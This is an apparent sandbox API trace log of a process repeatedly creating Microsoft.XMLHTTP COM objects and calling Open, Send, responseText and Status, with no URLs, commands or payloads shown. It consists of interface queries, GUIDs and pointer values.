	[0263.763] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b98, pUnkSite=0x62f310) 
	[0263.763] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0263.763] XMLHTTPRequest:IUnknown:Release (This=0x49c5b98) returned 0x0
	[0263.763] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0263.763] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0263.763] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0263.763] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0263.766] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0263.766] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0263.766] SysStringLen (param_1=0x0) returned 0x0
	[0263.766] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0263.766] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0263.766] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7520) returned 0x0
	[0263.766] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0263.766] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0263.766] ??2@YAPEAX_K@Z () returned 0x62f330
	[0263.766] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f330) 
	[0263.766] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0263.766] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0263.766] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7520) returned 0x0
	[0263.766] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7520) returned 0x3
	[0263.766] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0263.767] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7520, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0263.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0263.767] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0263.767] SysStringLen (param_1=0x0) returned 0x0
	[0263.767] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0263.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0263.767] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c20) returned 0x0
	[0263.767] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0263.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0263.767] ??2@YAPEAX_K@Z () returned 0x62f310
	[0263.767] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0263.767] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0263.767] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0263.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c20) returned 0x0
	[0263.767] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c20) returned 0x3
	[0263.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0263.767] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c20, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0263.768] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0263.768] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0263.768] SysStringLen (param_1=0x0) returned 0x0
	[0263.768] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0263.768] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0263.768] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0263.768] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0263.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0263.769] ??2@YAPEAX_K@Z () returned 0x62f330
	[0263.769] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f330) 
	[0263.769] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0263.769] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0263.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0263.769] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0263.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0263.769] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0263.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0263.769] longjmp () 
	[0263.769] longjmp () 
	[0263.769] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0263.769] SysStringLen (param_1=0x0) returned 0x0
	[0263.769] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0263.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0263.770] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0263.770] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0263.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0263.770] ??2@YAPEAX_K@Z () returned 0x62f310
	[0263.770] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0263.770] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0263.770] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0263.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0263.770] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0263.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0263.770] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0263.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0263.770] longjmp () 
	[0263.770] longjmp () 
	[0263.770] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0263.770] SysStringLen (param_1=0x0) returned 0x0
	[0263.771] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0263.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0263.771] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0263.771] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0263.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c28) returned 0x0
	[0263.771] ??2@YAPEAX_K@Z () returned 0x62f330
	[0263.771] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c28, pUnkSite=0x62f330) 
	[0263.771] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0263.771] XMLHTTPRequest:IUnknown:Release (This=0x49c5c28) returned 0x0
	[0263.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0263.771] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0263.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0263.771] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0263.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0263.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0263.771] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0263.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0264.956] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0264.956] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0264.956] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0264.956] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0264.956] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0264.956] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
